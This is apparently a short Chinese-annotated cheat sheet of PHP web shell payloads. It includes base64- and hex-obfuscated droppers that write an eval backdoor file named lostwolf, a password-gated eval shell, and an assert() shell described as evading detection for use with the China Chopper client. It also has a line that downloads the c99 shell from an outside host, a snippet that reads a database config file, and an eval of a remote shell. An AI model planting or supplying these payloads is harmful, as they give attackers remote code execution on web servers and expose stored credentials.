<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>
生成：<?php @eval($_POST['lostwolf']);?>



<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>





<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>



<script language="php">

fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"));
</script>






//file:lostwolf.php
//pass:lostwolf







高强度密码：

<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>

  

//菜刀提交  http://192.168.1.5/x.php?x=lostwolf  脚本类型:php  密码为 c





<?php assert($_REQUEST["c"]);?>     //菜刀连接 躲避检测 密码c 



下载远程shell

<?php
echo copy("http://www.r57.me/c99.txt","lostwolf.php");
?> 



<? echo file_get_contents("..//cfg_database.php");?> //显示某文件类容

<? eval ( file_get_contents("远程shell")) ?> //运行远程shell